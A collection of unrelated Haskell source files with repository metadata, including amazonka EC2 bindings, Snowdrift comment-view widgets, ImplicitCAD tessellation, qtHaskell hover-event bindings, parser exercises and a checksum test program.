instance ToPath DescribeExportTasks where
toPath = const "/"
instance ToQuery DescribeExportTasks where
toQuery DescribeExportTasks{..} = mconcat
[ "ExportTaskId" `toQueryList` _detExportTaskIds
]
instance ToHeaders DescribeExportTasks
instance AWSRequest DescribeExportTasks where
type Sv DescribeExportTasks = EC2
type Rs DescribeExportTasks = DescribeExportTasksResponse
request = post "DescribeExportTasks"
response = xmlResponse
instance FromXML DescribeExportTasksResponse where
parseXML x = DescribeExportTasksResponse
<$> x .@? "exportTaskSet" .!@ mempty
| romanb/amazonka | amazonka-ec2/gen/Network/AWS/EC2/DescribeExportTasks.hs | mpl-2.0 | 3,584 | 0 | 10 | 714 | 434 | 265 | 169 | 52 | 1 |
module View.Comment
( commentForm
, commentFormWidget
, commentForestWidget
, commentTreeWidget
, commentWidget
, disabledCommentForm
-- Comment action forms
, claimCommentForm
, unclaimCommentForm
, watchCommentForm
, unwatchCommentForm
, closeCommentForm
, commentNewTopicForm
, commentReplyForm
, createCommentTagForm
, editCommentForm
, flagCommentForm
, generateFlagCommentForm
, newCommentTagForm
, rethreadCommentForm
, retractCommentForm
-- Comment action form widgets
, approveCommentFormWidget
, claimCommentFormWidget
, closeCommentFormWidget
, commentNewTopicFormWidget
, commentReplyFormWidget
, deleteCommentFormWidget
, editCommentFormWidget
, flagCommentFormWidget
, rethreadCommentFormWidget
, retractCommentFormWidget
, unclaimCommentFormWidget
, watchCommentFormWidget
, unwatchCommentFormWidget
-- Misc
, orderingNewestFirst
) where
import Import
import Model.Comment
import Model.Comment.ActionPermissions
import Model.Comment.Routes
import Model.Tag
import Model.User
import Model.Markdown
import View.User
import Widgets.Markdown
import Widgets.Tag
import Widgets.Time
import qualified Data.List as L
import qualified Data.Map as M
import qualified Data.Text as T
import qualified Data.Traversable as Traversable
import Data.Tree (Forest, Tree(..))
import qualified Data.Tree as Tree
disabledCommentForm :: Form Markdown
disabledCommentForm = renderBootstrap3 BootstrapBasicForm $ areq snowdriftMarkdownField ("Reply" { fsAttrs = [("disabled",""), ("class","form-control")] }) Nothing
closureForm :: SomeMessage App -> Maybe Markdown -> Form NewClosure
closureForm label message = renderBootstrap3 BootstrapBasicForm $ NewClosure <$> areq' snowdriftMarkdownField label message
commentForm :: SomeMessage App -> Maybe Markdown -> Form NewComment
commentForm label content = renderBootstrap3 BootstrapBasicForm $ NewComment
<$> areq' snowdriftMarkdownField label content
<*> pure VisPublic
<*> areq' (selectField makeLanguageOptions) "Language" Nothing
-- TODO replace pure line above with below and uncomment where to activate private commenting
-- <*> (toVisibility <$> areq' checkBoxField "Private?" Nothing)
-- where
-- toVisibility True = VisPrivate
-- toVisibility _ = VisPublic
commentFormWidget :: Text -> SomeMessage App -> Maybe Markdown -> Widget
commentFormWidget post_text label content = commentFormWidget' True post_text (commentForm label content)
-- intentional duplication of commentFormWidget' because some aspects
-- of closing and other markdown aren't identical (such as marking privacy)
closureFormWidget' :: Text -> Form NewClosure -> Widget
closureFormWidget' post_text form = do
(widget, enctype) <- handlerToWidget $ generateFormPost form
[whamlet|
<div>
<form method="POST" enctype=#{enctype}>
^{widget}
<button type="submit" name="mode" value="preview">preview
<button type="submit" name="mode" value="post">#{post_text}
|]
commentFormWidget' :: Bool -> Text -> Form a -> Widget
commentFormWidget' can_preview post_text form = do
(widget, enctype) <- handlerToWidget $ generateFormPost form
[whamlet|
<div>
<form method="POST" enctype=#{enctype}>
^{widget}
$if can_preview
<button type="submit" name="mode" value="preview">preview
<button type="submit" name="mode" value="post">#{post_text}
|]
closeCommentForm :: Maybe Markdown -> Form NewClosure
retractCommentForm :: Maybe Markdown -> Form NewClosure
commentNewTopicForm :: Form NewComment
commentReplyForm :: Form NewComment
editCommentForm :: Markdown -> Language -> Form EditComment
closeCommentForm = closureForm "Reason for closing:"
retractCommentForm = closureForm "Reason for retracting:"
commentNewTopicForm = commentForm "New Topic" Nothing
commentReplyForm = commentForm "Reply" Nothing
editCommentForm content language =
renderBootstrap3 BootstrapBasicForm $ EditComment
<$> areq' snowdriftMarkdownField "Edit" (Just content)
<*> areq' (selectField makeLanguageOptions) "Language" (Just language)
claimCommentFormWidget :: Maybe (Maybe Text) -> Widget
closeCommentFormWidget :: Maybe Markdown -> Widget
commentNewTopicFormWidget :: Widget
commentReplyFormWidget :: Widget
retractCommentFormWidget :: Maybe Markdown -> Widget
unclaimCommentFormWidget :: Maybe (Maybe Text) -> Widget
watchCommentFormWidget :: Widget
unwatchCommentFormWidget :: Widget
editCommentFormWidget :: Markdown -> Language -> Widget
closeCommentFormWidget = closureFormWidget' "close" . closeCommentForm
retractCommentFormWidget = closureFormWidget' "retract" . retractCommentForm
claimCommentFormWidget = commentFormWidget' False "claim" . claimCommentForm
unclaimCommentFormWidget = commentFormWidget' False "unclaim" . unclaimCommentForm
commentNewTopicFormWidget = commentFormWidget' True "post" commentNewTopicForm
commentReplyFormWidget = commentFormWidget' True "post" commentReplyForm
watchCommentFormWidget = commentFormWidget' False "watch" watchCommentForm
unwatchCommentFormWidget = commentFormWidget' False "unwatch" unwatchCommentForm
editCommentFormWidget content language =
commentFormWidget' True "post" $ editCommentForm content language
approveCommentFormWidget :: Widget
approveCommentFormWidget =
[whamlet|
<form method="POST">
<button type="submit" name="mode" value="post">approve
|]
claimCommentForm :: Maybe (Maybe Text) -> Form (Maybe Text)
claimCommentForm = renderBootstrap3 BootstrapBasicForm . aopt' textField "Note (optional)"
unclaimCommentForm :: Maybe (Maybe Text) -> Form (Maybe Text)
unclaimCommentForm = renderBootstrap3 BootstrapBasicForm . aopt' textField "Note (optional)"
rethreadCommentForm :: Form (Text, Text)
rethreadCommentForm = renderBootstrap3 BootstrapBasicForm $ (,)
<$> areq' textField "New Parent Url" Nothing
<*> areq' textField "Reason" Nothing
rethreadCommentFormWidget :: Widget
rethreadCommentFormWidget = do
(form, enctype) <- handlerToWidget (generateFormPost rethreadCommentForm)
[whamlet|
<form method=post enctype=#{enctype}>
^{form}
<button type="submit" name="mode" value="post">rethread
|]
watchCommentForm :: Form ()
watchCommentForm = renderBootstrap3 BootstrapBasicForm $ pure ()
unwatchCommentForm :: Form ()
unwatchCommentForm = renderBootstrap3 BootstrapBasicForm $ pure ()
createCommentTagForm :: Form Text
createCommentTagForm = renderBootstrap3 BootstrapBasicForm $ areq' textField "Make a new tag:" Nothing
newCommentTagForm :: [Entity Tag] -> [Entity Tag] -> Form (Maybe [TagId], Maybe [TagId])
newCommentTagForm project_tags other_tags = renderBootstrap3 BootstrapBasicForm $ (,)
-- <$> fmap (\(Entity tag_id tag) -> aopt checkBoxField (tag_id) (tagName tag)) (project_tags <> other_tags)
<$> aopt (tagCloudFieldList project_tags) "Tags used elsewhere in this project:" Nothing
<*> aopt (tagCloudFieldList other_tags) "Tags used in other projects:" Nothing
-- <*> areq hiddenField "" (Just "apply")
where
tagCloudFieldList tags =
let toOption (Entity tag_id tag) = Option
{ optionDisplay = tagName tag
, optionInternalValue = tag_id
, optionExternalValue =
(\(PersistInt64 i) -> T.pack $ show i) $
toPersistValue tag_id
}
optlist = OptionList
{ olOptions = map toOption tags
, olReadExternal = Just . key . PersistInt64 . read . T.unpack
}
in checkboxesField' (return optlist)
flagCommentForm :: Maybe (Maybe [FlagReason]) -> Maybe (Maybe Markdown) -> Form (Maybe [FlagReason], Maybe Markdown)
flagCommentForm def_reasons def_message = renderBootstrap3 BootstrapBasicForm $ (,) <$> flagReasonsForm <*> additionalCommentsForm
where
flagReasonsForm :: AForm Handler (Maybe [FlagReason])
flagReasonsForm = aopt (checkboxesFieldList reasons) "" def_reasons
where
reasons :: [(Text, FlagReason)]
reasons = map (descFlagReason &&& id) [minBound..maxBound]
additionalCommentsForm :: AForm Handler (Maybe Markdown)
additionalCommentsForm = aopt' snowdriftMarkdownField "Optional: add helpful comments to clarify the issue and/or suggestions for improvement" def_message
flagCommentFormWidget :: Maybe (Maybe [FlagReason]) -> Maybe (Maybe Markdown) -> Widget
flagCommentFormWidget def_reasons def_message = do
(form, enctype) <- handlerToWidget (generateFormPost (flagCommentForm def_reasons def_message))
[whamlet|
<form method="POST" enctype=#{enctype}>
<h4>Code of Conduct Violation(s):
^{form}
<button type="submit" name="mode" value="preview">preview
<button type="submit" name="mode" value="post">flag
|]
generateFlagCommentForm :: Maybe (Maybe [FlagReason]) -> Maybe (Maybe Markdown) -> Widget
generateFlagCommentForm reasons message = do
(form, _) <- handlerToWidget (generateFormPost $ flagCommentForm reasons message)
[whamlet|
<h4>Code of Conduct Violation(s):
^{form}
|]
toWidget [cassius|
.preview-action-button[type=submit]
background : dark-red
background-image : linear-gradient(#ee2700, #bd1000)
border-color: #a5022a
.preview-action-button[type=submit]:hover, .preview-action-button[type=submit]:focus, .preview-action-button[type=submit]:active
background : red
background-image : linear-gradient(#d22935, #a5022a)
|]
deleteCommentFormWidget :: Widget
deleteCommentFormWidget =
[whamlet|
<div>
<form method=POST>
<button type="submit" name="mode" value="post">delete
<button type="submit" name="mode" value="cancel">cancel
|]
-- | Order comment trees by newest-first, taking the root and all children of each
-- tree into consideration (essentially compares each tree's newest comment,
-- no matter how deeply nested).
orderingNewestFirst :: Tree (Entity Comment) -> Tree (Entity Comment) -> Ordering
orderingNewestFirst = flip (compare `on` (timestamp . newest))
where
newest :: Tree (Entity Comment) -> Entity Comment
newest = L.maximumBy (compare `on` timestamp) . Tree.flatten
timestamp :: Entity Comment -> UTCTime
timestamp = commentCreatedTs . entityVal
expandCommentWidget :: Int -> MaxDepth -> Widget
expandCommentWidget num_replies new_max_depth = do
Just cur_route <- getCurrentRoute
let new_route = case new_max_depth of
NoMaxDepth -> (cur_route, [])
MaxDepth n -> (cur_route, [("maxdepth", T.pack (show n))])
[whamlet|
<a .expand href=@?{new_route}>
#{num_replies} more #{plural num_replies "reply" "replies"}
|]
-- | An entire comment forest.
commentForestWidget
:: Forest (Entity Comment)
-> Maybe UserId -- ^ Viewer.
-> CommentRoutes
-> MakeActionPermissionsMap
-> [CommentClosing] -- ^ Earlier closures.
-> [CommentRetracting] -- ^ Earlier retracts.
-> Map UserId User
-> Map CommentId CommentClosing
-> Map CommentId CommentRetracting
-> Map CommentId (Entity Ticket)
-> Map CommentId TicketClaiming
-> Map CommentId (CommentFlagging, [FlagReason])
-> Bool -- ^ Is preview?
-> MaxDepth -- ^ Max depth.
-> Int -- ^ Depth.
-> Widget -- ^ Widget to display under each root comment.
-> Widget
commentForestWidget
comment_forest
mviewer_id
comment_routes
make_action_permissions_map
earlier_closures
earlier_retracts
user_map
close_map
retract_map
ticket_map
claim_map
flag_map
is_preview
max_depth
depth
widget_under_root_comment = do
action_permissions_map <- handlerToWidget (make_action_permissions_map (concatMap Tree.flatten comment_forest))
forM_ comment_forest $ \comment_tree ->
commentTreeWidget'
comment_tree
mviewer_id
comment_routes
action_permissions_map
earlier_closures
earlier_retracts
user_map
close_map
retract_map
ticket_map
claim_map
flag_map
is_preview
max_depth
depth
widget_under_root_comment
-- | An entire comment tree.
commentTreeWidget
:: Tree (Entity Comment)
-> Maybe UserId -- ^ Viewer.
-> CommentRoutes
-> MakeActionPermissionsMap
-> [CommentClosing] -- ^ Earlier closures.
-> [CommentRetracting] -- ^ Earlier retracts.
-> Map UserId User
-> Map CommentId CommentClosing
-> Map CommentId CommentRetracting
-> Map CommentId (Entity Ticket)
-> Map CommentId TicketClaiming
-> Map CommentId (CommentFlagging, [FlagReason])
-> Bool -- ^ Is preview?
-> MaxDepth
-> Int -- ^ Depth.
-> Widget -- ^ Form to display under the root comment.
-> Widget
commentTreeWidget tree = commentForestWidget [tree]
-- | Helper function for commentForestWidget/commentTreeWidget that takes an
-- ActionPermissionsMap (as opposed to a MakeActionPermissionsMap). Unexported.
commentTreeWidget'
:: Tree (Entity Comment)
-> Maybe UserId -- ^ Viewer.
-> CommentRoutes
-> ActionPermissionsMap
-> [CommentClosing] -- ^ Earlier closures.
-> [CommentRetracting] -- ^ Earlier retracts.
-> Map UserId User
-> Map CommentId CommentClosing
-> Map CommentId CommentRetracting
-> Map CommentId (Entity Ticket)
-> Map CommentId TicketClaiming
-> Map CommentId (CommentFlagging, [FlagReason])
-> Bool -- ^ Is preview?
-> MaxDepth
-> Int -- ^ Depth.
-> Widget -- ^ Form to display under the root comment.
-> Widget
commentTreeWidget'
(Node root_entity@(Entity root_id root) children)
mviewer_id
comment_routes
action_permissions_map
earlier_closures
earlier_retracts
user_map
close_map
retract_map
ticket_map
claim_map
flag_map
is_preview
max_depth
depth
form_under_root_comment = do
let num_children = length children
inner_widget =
form_under_root_comment <>
if MaxDepth depth >= max_depth && num_children > 0
then expandCommentWidget num_children (addMaxDepth max_depth 2) -- FIXME: arbitrary '2' here
else forM_ children $ \child ->
commentTreeWidget'
child
mviewer_id
comment_routes
action_permissions_map
[] -- don't want to show earlier closures on *all* comments, just the first one.
[] -- same for earlier retracts
user_map
close_map
retract_map
ticket_map
claim_map
flag_map
is_preview
max_depth
(depth+1)
mempty
commentWidget
root_entity
mviewer_id
comment_routes
(lookupErr "comment id missing from action permissions map" root_id action_permissions_map)
earlier_closures
earlier_retracts
(lookupErr "comment user missing from user map" (commentUser root) user_map)
(M.lookup root_id close_map)
(M.lookup root_id retract_map)
(M.lookup root_id ticket_map)
(M.lookup root_id claim_map)
(M.lookup root_id flag_map)
is_preview
inner_widget
-- | A "single" comment, which also displays an 'inner widget' inside of it.
-- The reason this can't be made more modular is the HTML for nested comments
-- requires us to render the entire tree (can't close the parent comment's div
-- before the children comments).
--
-- Note this widget has NO CSS.
commentWidget :: Entity Comment -- ^ Comment.
-> Maybe UserId -- ^ Viewer.
-> CommentRoutes -- ^ Comment routes.
-> CommentActionPermissions -- ^ Permissions for comment actions.
-> [CommentClosing] -- ^ Earlier closures.
-> [CommentRetracting] -- ^ Earlier retracts.
-> User -- ^ Comment poster.
-> Maybe CommentClosing -- ^ Is this closed?
-> Maybe CommentRetracting -- ^ Is this retracted?
-> Maybe (Entity Ticket) -- ^ Is this a ticket?
-> Maybe TicketClaiming -- ^ Is this ticket claimed?
-> Maybe (CommentFlagging, [FlagReason]) -- ^ Is this flagged?
-> Bool -- ^ Is this a preview?
-> Widget -- ^ Inner widget (children comments, 'expand' link, reply box, etc)
-> Widget
commentWidget (Entity comment_id comment)
mviewer_id
CommentRoutes{..}
CommentActionPermissions{..}
earlier_closures
earlier_retracts
user
mclosure
mretract
mticket
mclaim
mflag
is_preview
inner_widget = do
let user_id = commentUser comment
is_unapproved = not . commentIsApproved $ comment
is_top_level = commentIsTopLevel comment
is_even_depth = commentIsEvenDepth comment
is_odd_depth = commentIsOddDepth comment
is_private = commentIsPrivate comment
is_closed = isJust mclosure
-- TODO: Lots of refactoring to lift this database hit up to the
-- controller layer. This currently has horrible performance - a hit *per* comment!
tags <- handlerToWidget $ runDB $
maybe [] sortAnnotTagsByName .
M.lookup comment_id <$>
(fetchCommentCommentTagsDB comment_id >>= buildAnnotatedCommentTagsDB mviewer_id)
user_map <- case mclaim of
Nothing -> return M.empty
Just claim -> do
let claiming_user_id = ticketClaimingUser claim
Just claiming_user <- runDB $ get claiming_user_id
return $ M.singleton claiming_user_id claiming_user
let shpack = T.pack . show
persistValue = toPersistValue . entityKey
ticket_str <- case persistValue <$> mticket of
Just (PersistInt64 tid) -> return $ shpack tid
_ -> do
mrethread_ticket <- fmap join $ runDB $ do
mcomment_rethread <- fetchCommentRethreadLastDB comment_id
Traversable.forM mcomment_rethread $ \comment_rethread ->
getBy $ UniqueTicket comment_rethread
return $ case persistValue <$> mrethread_ticket of
Just (PersistInt64 rtid) -> shpack rtid
_ -> "???"
let prettyTicketLine line =
let pretty title = "<div class='ticket-title'>SD-" <> ticket_str <> ": " <> title <> "</div>"
in return $ maybe line pretty $ T.stripPrefix "ticket: " line
commentTextTransform = prettyTicketLine
$(whamletFile "templates/comment.hamlet")
| chreekat/snowdrift | View/Comment.hs | agpl-3.0 | 20,568 | 0 | 20 | 6,062 | 3,482 | 1,808 | 1,674 | -1 | -1 |
-- Implicit CAD. Copyright (C) 2011, Christopher Olah (chris@colah.ca)
-- Copyright (C) 2016, Julia Longtin (julial@turinglace.com)
-- Released under the GNU AGPLV3+, see LICENSE
module Graphics.Implicit.Export.Render.TesselateLoops (tesselateLoop) where
import Prelude(return, ($), length, (==), zip, init, tail, reverse, (<), (/), null, foldl1, (++), head, (*), abs, (>), (&&), (+), concatMap)
import Graphics.Implicit.Definitions (ℝ, ℕ, Obj3, ℝ3, TriangleMesh(TriangleMesh), (⋅), Triangle(Triangle))
import Graphics.Implicit.Export.Render.Definitions (TriSquare(Tris, Sq))
import Graphics.Implicit.Export.Util (centroid)
import Data.VectorSpace (normalized, (^-^), (^+^), magnitude, (^/), (^*))
import Data.List (genericLength)
import Data.Cross (cross3)
-- FIXME: res should be ℝ3.
tesselateLoop :: ℝ -> Obj3 -> [[ℝ3]] -> [TriSquare]
tesselateLoop _ _ [] = []
tesselateLoop _ _ [[a,b],[_,c],[_,_]] = [Tris $ TriangleMesh [Triangle (a,b,c)]]
{-
#____# #____#
| | | |
# # -> #____#
| | | |
#____# #____#
-}
tesselateLoop res obj [[_,_], as@(_:_:_:_),[_,_], bs@(_:_:_:_)] | length as == length bs =
concatMap (tesselateLoop res obj)
[[[a1,b1],[b1,b2],[b2,a2],[a2,a1]] | ((a1,b1),(a2,b2)) <- zip (init pairs) (tail pairs)]
where pairs = zip (reverse as) bs
tesselateLoop res obj [as@(_:_:_:_),[_,_], bs@(_:_:_:_), [_,_] ] | length as == length bs =
concatMap (tesselateLoop res obj)
[[[a1,b1],[b1,b2],[b2,a2],[a2,a1]] | ((a1,b1),(a2,b2)) <- zip (init pairs) (tail pairs)]
where pairs = zip (reverse as) bs
{-
#__#
| | -> if parallegram then quad
#__#
-}
-- NOTE: colah thought this was broken.
tesselateLoop _ _ [[a,_],[b,_],[c,_],[d,_]] | centroid [a,c] == centroid [b,d] =
let
b1 = normalized $ a ^-^ b
b2 = normalized $ c ^-^ b
b3 = b1 `cross3` b2
in [Sq (b1,b2,b3) (a ⋅ b3) (a ⋅ b1, c ⋅ b1) (a ⋅ b2, c ⋅ b2) ]
{-
#__# #__#
| | -> | /|
#__# #/_#
-}
-- | Create a pair of triangles from a quad.
-- FIXME: magic number
tesselateLoop res obj [[a,_],[b,_],[c,_],[d,_]] | obj (centroid [a,c]) < res/30 =
return $ Tris $ TriangleMesh [Triangle (a,b,c), Triangle (a,c,d)]
-- Fallback case: make fans
-- FIXME: magic numbers.
tesselateLoop res obj pathSides = return $ Tris $ TriangleMesh $
let
path' = concatMap init pathSides
(early_tris,path) = shrinkLoop 0 path' res obj
in if null path
then early_tris
else let
mid@(_,_,_) = centroid path
midval = obj mid
preNormal = foldl1 (^+^)
[ a `cross3` b | (a,b) <- zip path (tail path ++ [head path]) ]
preNormalNorm = magnitude preNormal
normal = preNormal ^/ preNormalNorm
deriv = (obj (mid ^+^ (normal ^* (res/100)) ) ^-^ midval)/res*100
mid' = mid ^-^ normal ^* (midval/deriv)
in if abs midval > res/50 && preNormalNorm > 0.5 && abs deriv > 0.5
&& abs (midval/deriv) < 2*res && 3*abs (obj mid') < abs midval
then early_tris ++ [Triangle (a,b,mid') | (a,b) <- zip path (tail path ++ [head path]) ]
else early_tris ++ [Triangle (a,b,mid) | (a,b) <- zip path (tail path ++ [head path]) ]
shrinkLoop :: ℕ -> [ℝ3] -> ℝ -> Obj3 -> ([Triangle], [ℝ3])
shrinkLoop _ path@[a,b,c] res obj =
if abs (obj $ centroid [a,b,c]) < res/50
then
( [Triangle (a,b,c)], [])
else
([], path)
-- FIXME: magic number.
shrinkLoop n path@(a:b:c:xs) res obj | n < genericLength path =
if abs (obj (centroid [a,c])) < res/50
then
let (tris,remainder) = shrinkLoop 0 (a:c:xs) res obj
in (Triangle (a,b,c):tris, remainder)
else
shrinkLoop (n+1) (b:c:xs ++ [a]) res obj
shrinkLoop _ path _ _ = ([],path)
| krakrjak/ImplicitCAD | Graphics/Implicit/Export/Render/TesselateLoops.hs | agpl-3.0 | 3,839 | 2 | 24 | 936 | 1,799 | 1,030 | 769 | 57 | 3 |
module Main where
import Graphics.UI.ShinyUI
import Graphics.UI.InterfaceDescription
main :: IO ()
main = do
let interface = window "WindowClass" "WindowId" $ do return ()
let style = []
execute interface style | kchugalinskiy/shiny-head | samples/EmptyWindow.hs | lgpl-3.0 | 215 | 0 | 14 | 35 | 76 | 38 | 38 | 8 | 1 |
{-# LANGUAGE RankNTypes #-}
module LearnParsers where
import Text.Trifecta
import Text.Parser.Combinators
stop :: Parser a
stop = unexpected "stop"
one = char '1'
two = char '2'
three = char '3'
one' = one >> stop
-- read two characters, '1' and '2'
oneTwo = char '1' >> char '2'
-- read two characters, '1' and '2', then die
oneTwo' = oneTwo >> stop
testParse :: Parser Char -> IO ()
testParse p =
print $ parseString p mempty "123"
testEOF :: Parser () -> IO ()
testEOF p =
print $ parseString p mempty "123"
-- string parsers
type S = forall m. CharParsing m => m String
oneS :: S
oneS = string "1"
oneTwoS :: S
oneTwoS = string "12"
oneTwoThreeS :: S
oneTwoThreeS = string "123"
testParse' :: Parser String -> IO ()
testParse' p =
print $ parseString p mempty "123"
-- One Parser rules them all
-- how do we prevent >> to drop it on the floor?
--
pNL s = putStrLn ('\n' : s)
main = do
pNL "stop:"
testParse stop
pNL "one:"
testParse one
pNL "one':"
testParse one'
pNL "oneTwo:"
testParse oneTwo
pNL "oneTwo':"
testParse oneTwo'
pNL "one >> EOF:"
testEOF (one >> eof)
pNL "oneTwo >> EOF"
testEOF (oneTwo >> eof)
pNL "string \"1\", \"12\", \"123\""
testParse' (choice [ oneTwoThreeS
, oneTwoS
, oneS
, stop ])
pNL "char \"1\", \"12\", \"123\""
testParse (choice [ one >> two >> three
, one >> two
, one
, stop ])
| dmvianna/haskellbook | src/Ch24-LearnParsers.hs | unlicense | 1,499 | 0 | 12 | 433 | 458 | 222 | 236 | 54 | 1 |
module BridgeBuddy (module BridgeBuddy) where
import BridgeBuddy.Cards as BridgeBuddy
import BridgeBuddy.CardsJson as BridgeBuddy
| derekmcloughlin/BridgeBuddyServer | library/BridgeBuddy.hs | apache-2.0 | 130 | 0 | 4 | 13 | 24 | 17 | 7 | 3 | 0 |
data TrafficLight = Red | Yellow | Green
instance Eq TrafficLight where
Red == Red = True
Yellow == Yellow = True
Green == Green = True
_ == _ = False
instance Show TrafficLight where
show Red = "Red light"
show Yellow = "Yellow light"
show Green = "Green light"
| Oscarzhao/haskell | learnyouahaskell/TrafficLight.hs | apache-2.0 | 296 | 0 | 6 | 84 | 98 | 48 | 50 | 10 | 0 |
{-# OPTIONS -fglasgow-exts #-}
-----------------------------------------------------------------------------
{-| Module : QHoverEvent.hs
Copyright : (c) David Harley 2010
Project : qtHaskell
Version : 1.1.4
Modified : 2010-09-02 17:02:18
Warning : this file is machine generated - do not modify.
--}
-----------------------------------------------------------------------------
module Qtc.Gui.QHoverEvent (
QqqHoverEvent(..), QqHoverEvent(..)
,QqqHoverEvent_nf(..), QqHoverEvent_nf(..)
,qHoverEvent_delete
)
where
import Qth.ClassTypes.Core
import Qtc.Enums.Base
import Qtc.Enums.Core.QEvent
import Qtc.Classes.Base
import Qtc.Classes.Qccs
import Qtc.Classes.Core
import Qtc.ClassTypes.Core
import Qth.ClassTypes.Core
import Qtc.Classes.Gui
import Qtc.ClassTypes.Gui
class QqqHoverEvent x1 where
qqHoverEvent :: x1 -> IO (QHoverEvent ())
class QqHoverEvent x1 where
qHoverEvent :: x1 -> IO (QHoverEvent ())
instance QqHoverEvent ((QHoverEvent t1)) where
qHoverEvent (x1)
= withQHoverEventResult $
withObjectPtr x1 $ \cobj_x1 ->
qtc_QHoverEvent cobj_x1
foreign import ccall "qtc_QHoverEvent" qtc_QHoverEvent :: Ptr (TQHoverEvent t1) -> IO (Ptr (TQHoverEvent ()))
instance QqqHoverEvent ((QEventType, QPoint t2, QPoint t3)) where
qqHoverEvent (x1, x2, x3)
= withQHoverEventResult $
withObjectPtr x2 $ \cobj_x2 ->
withObjectPtr x3 $ \cobj_x3 ->
qtc_QHoverEvent1 (toCLong $ qEnum_toInt x1) cobj_x2 cobj_x3
foreign import ccall "qtc_QHoverEvent1" qtc_QHoverEvent1 :: CLong -> Ptr (TQPoint t2) -> Ptr (TQPoint t3) -> IO (Ptr (TQHoverEvent ()))
instance QqHoverEvent ((QEventType, Point, Point)) where
qHoverEvent (x1, x2, x3)
= withQHoverEventResult $
withCPoint x2 $ \cpoint_x2_x cpoint_x2_y ->
withCPoint x3 $ \cpoint_x3_x cpoint_x3_y ->
qtc_QHoverEvent2 (toCLong $ qEnum_toInt x1) cpoint_x2_x cpoint_x2_y cpoint_x3_x cpoint_x3_y
foreign import ccall "qtc_QHoverEvent2" qtc_QHoverEvent2 :: CLong -> CInt -> CInt -> CInt -> CInt -> IO (Ptr (TQHoverEvent ()))
class QqqHoverEvent_nf x1 where
qqHoverEvent_nf :: x1 -> IO (QHoverEvent ())
class QqHoverEvent_nf x1 where
qHoverEvent_nf :: x1 -> IO (QHoverEvent ())
instance QqHoverEvent_nf ((QHoverEvent t1)) where
qHoverEvent_nf (x1)
= withObjectRefResult $
withObjectPtr x1 $ \cobj_x1 ->
qtc_QHoverEvent cobj_x1
instance QqqHoverEvent_nf ((QEventType, QPoint t2, QPoint t3)) where
qqHoverEvent_nf (x1, x2, x3)
= withObjectRefResult $
withObjectPtr x2 $ \cobj_x2 ->
withObjectPtr x3 $ \cobj_x3 ->
qtc_QHoverEvent1 (toCLong $ qEnum_toInt x1) cobj_x2 cobj_x3
instance QqHoverEvent_nf ((QEventType, Point, Point)) where
qHoverEvent_nf (x1, x2, x3)
= withObjectRefResult $
withCPoint x2 $ \cpoint_x2_x cpoint_x2_y ->
withCPoint x3 $ \cpoint_x3_x cpoint_x3_y ->
qtc_QHoverEvent2 (toCLong $ qEnum_toInt x1) cpoint_x2_x cpoint_x2_y cpoint_x3_x cpoint_x3_y
instance QoldPos (QHoverEvent a) (()) where
oldPos x0 ()
= withPointResult $ \cpoint_ret_x cpoint_ret_y ->
withObjectPtr x0 $ \cobj_x0 ->
qtc_QHoverEvent_oldPos_qth cobj_x0 cpoint_ret_x cpoint_ret_y
foreign import ccall "qtc_QHoverEvent_oldPos_qth" qtc_QHoverEvent_oldPos_qth :: Ptr (TQHoverEvent a) -> Ptr CInt -> Ptr CInt -> IO ()
instance QqoldPos (QHoverEvent a) (()) where
qoldPos x0 ()
= withObjectRefResult $
withObjectPtr x0 $ \cobj_x0 ->
qtc_QHoverEvent_oldPos cobj_x0
foreign import ccall "qtc_QHoverEvent_oldPos" qtc_QHoverEvent_oldPos :: Ptr (TQHoverEvent a) -> IO (Ptr (TQPoint ()))
instance Qpos (QHoverEvent a) (()) (IO (Point)) where
pos x0 ()
= withPointResult $ \cpoint_ret_x cpoint_ret_y ->
withObjectPtr x0 $ \cobj_x0 ->
qtc_QHoverEvent_pos_qth cobj_x0 cpoint_ret_x cpoint_ret_y
foreign import ccall "qtc_QHoverEvent_pos_qth" qtc_QHoverEvent_pos_qth :: Ptr (TQHoverEvent a) -> Ptr CInt -> Ptr CInt -> IO ()
instance Qqpos (QHoverEvent a) (()) (IO (QPoint ())) where
qpos x0 ()
= withObjectRefResult $
withObjectPtr x0 $ \cobj_x0 ->
qtc_QHoverEvent_pos cobj_x0
foreign import ccall "qtc_QHoverEvent_pos" qtc_QHoverEvent_pos :: Ptr (TQHoverEvent a) -> IO (Ptr (TQPoint ()))
qHoverEvent_delete :: QHoverEvent a -> IO ()
qHoverEvent_delete x0
= withObjectPtr x0 $ \cobj_x0 ->
qtc_QHoverEvent_delete cobj_x0
foreign import ccall "qtc_QHoverEvent_delete" qtc_QHoverEvent_delete :: Ptr (TQHoverEvent a) -> IO ()
| uduki/hsQt | Qtc/Gui/QHoverEvent.hs | bsd-2-clause | 4,436 | 0 | 16 | 736 | 1,320 | 688 | 632 | -1 | -1 |
module Handler.Users (getUsersR) where
import Import
import Prelude (head)
import Control.Monad (forM)
import Data.Maybe (fromMaybe)
getUsersR :: Handler RepHtml
getUsersR = do
records <- runDB $ do
users <- selectList [] [Asc UserId]
creds <- selectList [] []
forM users $ \user -> do
let uid = entityKey user
let cred = head $ filter ((== uid) . identUser . entityVal) creds
return (user,cred)
defaultLayout $ do
setTitle "All users"
$(widgetFile "user/index")
| pbrisbin/devsite | Handler/Users.hs | bsd-2-clause | 553 | 0 | 23 | 162 | 197 | 98 | 99 | 17 | 1 |
import Data.Digest.Adler32
import Data.Digest.CRC32
import Control.Monad (forM_)
import Data.ByteString (ByteString)
import Data.ByteString.Char8 (pack)
import Data.Word (Word32)
import Foreign.ForeignPtr (mallocForeignPtr)
import System.IO.Unsafe (unsafePerformIO)
import qualified Data.ByteString.Internal as I
-- | Empty 'ByteString' whose pointer is null
emptyNull :: ByteString
emptyNull = I.PS I.nullForeignPtr 0 0
-- | Empty 'ByteString' whose pointer is not null
emptyNotNull :: ByteString
emptyNotNull = unsafePerformIO $ do
ptr <- mallocForeignPtr
return $ I.PS ptr 0 0
testStrings :: [ByteString]
testStrings =
[ emptyNull
, emptyNotNull
, pack "\0"
, pack "a"
, pack "hello"
, pack ['\0'..'\255']
]
runTest :: String -> (ByteString -> Word32) -> IO ()
runTest label func = do
putStrLn label
forM_ testStrings $ \s ->
putStrLn $ " " ++ (show . func) s
putStrLn ""
main :: IO ()
main = do
runTest "adler32" $ adler32
runTest "adler32Update 0" $ adler32Update 0
runTest "adler32Update 1" $ adler32Update 1
runTest "adler32Update 123" $ adler32Update 123
runTest "adler32Update 0xFFF0FFF0" $ adler32Update 0xFFF0FFF0
runTest "crc32" $ crc32
